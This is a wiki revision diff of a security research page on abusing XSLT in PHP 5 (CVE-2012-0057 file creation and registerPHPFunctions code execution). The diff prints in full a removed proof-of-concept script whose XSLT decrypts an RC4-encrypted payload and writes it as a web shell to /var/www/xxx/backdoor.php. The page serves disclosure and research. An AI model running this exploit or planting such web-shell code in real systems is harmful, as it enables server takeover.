Changes for page Application_PHP5
on 2012/01/18 22:39
on 2012/01/13 17:45
Summary
-
Page properties (1 modified, 0 added, 0 removed)
-
Attachments (0 modified, 0 added, 1 removed)
Details
- Page properties
-
- Content
-
... ... @@ -1,22 +5,15 @@ 1 -{{toc/}} 2 - 3 -= Introduction = 4 - 5 5 Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/PHP||rel="__blank"]] : "//PHP is a general-purpose server-side scripting language originally designed for web development to produce dynamic web pages. It is among one of the first developed server-side scripting languages that is embedded into a HTML source document, rather than calling an external file to process data. Ultimately, the code is interpreted by a web server with a PHP processor module which generates the resulting web page.//" 6 6 7 -= Creating files = 8 8 9 - Version5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, callsto libxslt werenot restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engineside, typicallyfor dropping a PHP Web Shell. This vulnerability ([[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]/ ([[CVE-2012-0057>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0057||rel="__blank" title="CVE-2012-0057"]]) was patched in version 5.3.9 ([[ChangeLog>>http://php.net/ChangeLog-5.php#5.3.9||rel="__blank"]]).4 +== Creating files == 10 10 11 - ==Simple PoC==6 +Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engine side, typically for dropping a PHP Web Shell. This vulnerability ([[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]) was patched in version 5.3.9 ([[ChangeLog>>http://php.net/ChangeLog-5.php#5.3.9||rel="__blank"]]). 12 12 13 -The attached [[create-file-via-libxslt.php>>attach:create-file-via-libxslt.php]] PoC will drop a basic PHP script in /tmp/. 14 14 15 -== PoC with crypto == 16 16 17 - A betterscript was later postedon[[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]]atRedHat request. This PHP script ([[attach:php539-xslt.php]]) will by defaultdisplay a pre-filled HTML form including XML data, XSLTcode and RC4-encrypted malicious PHP code. Whentheormis submitted, the user-controlled XML datais transformed using the user-controlled XSLT code.Then, the outputofthistransformation is displayedin thebrowser. Meanwhile, the maliciousPHPcode isdecryptedusinga static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php".10 +The attached [[create-file-via-libxslt.php>>attach:create-file-via-libxslt.php]] PoC will drop a basic PHP script in /tmp/. 18 18 19 -= Executing PHP code = 12 +== Executing PHP code == 20 20 21 21 A call to [[registerPHPFunctions()>>http://php.net/manual/en/xsltprocessor.registerphpfunctions.php]] allows to execute standard PHP functions directly from the XSLT stylesheet. I never came across this pattern in real-life engagements but Google Code search references [[several>>http://www.google.com/codesearch#search/&q=registerPHPFunctions%20lang:%5Ephp$&type=cs||rel="__blank"]] instances of it (dork: "registerPHPFunctions lang:^php$"). This isn't a bug and will not be patched. 22 22 ... ... @@ -24,4 +24,5 @@ 24 24 |=Namespace |=Extension function |=PoC |=Note 25 25 | http:~/~/php.net/xsl| Any PHP function|[[execute-code-via-libxslt.php>>attach:execute-code-via-libxslt.php]]| A call to registerPHPFunctions() is needed 26 26 20 + 27 27 The attached [[execute-code-via-libxslt.php>>attach:execute-code-via-libxslt.php]] PoC will use the passthru() PHP function to execute "uname -a".
- php539-xslt.php
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -2.0 KB - Content
-
... ... @@ -1,68 +1,0 @@ 1 - 2 -<?php 3 - 4 -// Get parameters 5 -$action = $_POST['action']; 6 -$xml = $_POST['xml']; 7 -$xsl = $_POST['xsl']; 8 - 9 -print "<html><body>"; 10 -if ($action == "transform") { 11 - 12 - print "<h2>Ready to transform ...</h2><br/>"; 13 - 14 - # LOAD XML FILE 15 - $xmldom = new DOMDocument(); 16 - print "XML: <pre>".htmlentities($xml)."</pre><br/>"; 17 - $xmldom->loadXML($xml); 18 - 19 - # LOAD XSLT FILE 20 - $xsldom = new DOMDocument(); 21 - print "XSL: <pre>".htmlentities($xsl)."</pre><br/>"; 22 - $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted ! 23 - 24 - # START XSLT 25 - $xslproc = new XSLTProcessor(); 26 - $xslproc->importStylesheet($xsldom); 27 - 28 - # TRANSFORM & PRINT 29 - $output = $xslproc->transformToXML($xmldom); // File creation ! 30 - print "Output: <pre>".htmlentities($output)."</pre><br/>"; 31 - 32 -} else { 33 - 34 - # DISPLAY A PRE-FILLED FORM 35 - print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>"; 36 - print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>"; 37 - print "<form method='post'>"; 38 - print "XML document:<br/>"; 39 - print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>"; 40 - print "XSLT code:<br/>"; 41 - print "<textarea name='xsl' rows='20' cols='130'>"; 42 -print <<<XSLT 43 -<xsl:stylesheet 44 - version="1.0" 45 - xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 46 - xmlns:cry="http://exslt.org/crypto" 47 - xmlns:sax="http://icl.com/saxon" 48 - extension-element-prefixes="cry sax"> 49 - 50 - <xsl:template match="/"> 51 - <sax:output href="/var/www/xxx/backdoor.php" method="text"> 52 - <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/> 53 - </sax:output> 54 - <xsl:text>A webshell have been dropped</xsl:text> 55 - </xsl:template> 56 - 57 -</xsl:stylesheet> 58 -XSLT; 59 - print "</textarea><br/><br/>"; 60 - print "<input type='hidden' name='action' value='transform'/>"; 61 - print "<input type='submit'/></form>"; 62 - 63 -} 64 -print "</body></html>"; 65 - 66 -?> 67 - 68 -